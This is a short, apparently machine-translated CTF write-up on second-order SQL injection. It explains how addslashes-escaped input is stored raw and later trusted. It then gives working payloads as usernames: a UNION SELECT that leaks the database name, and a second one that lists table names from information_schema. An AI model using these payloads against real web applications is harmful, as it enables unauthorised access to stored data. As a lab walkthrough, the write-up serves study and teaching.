2019年10月SQL注入的两倍

October 2019 Twice SQL Injection

The title reminds us that it is a secondary injection (SQL injection (secondary injection)Injection) - Zhihu), secondary injection vulnerability is a widespread form of security vulnerability in web applications.

The principle of secondary injection:

When inserting data into the database for the first time, I just used addslashes or escaped the special characters with the help of get_magic_quotes_gpc, but addslashes has a feature that although the parameters are filtered, "\" will be added to performEscape, but "\" will not be inserted into the database, and the original data will be retained when writing to the database.

After the data is stored in the database, the developer considers the data to be trusted.When the next query needs to be performed, the "dirty" data is directly removed from the database without further inspection and processing, which will cause secondary SQL injection.For example, when inserting data for the first time, there are single quotation marks in the data and it is directly inserted into the database; then in the next use, a secondary injection is formed in the process of piecing together.

Register an account at will and log in, enter the sql statement, and find that the server escapes our single quotes with \ and does not filter keywords

At this point we need to register a malicious username to log in to get what we want to know

The registered user name is 1' union select database() #, the password is a user

Return to the login page and enter the username (1' union select database() #) and password (a)

Login found that the database ctftraining was exposed

Use the same method to explode the table: Username: 1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #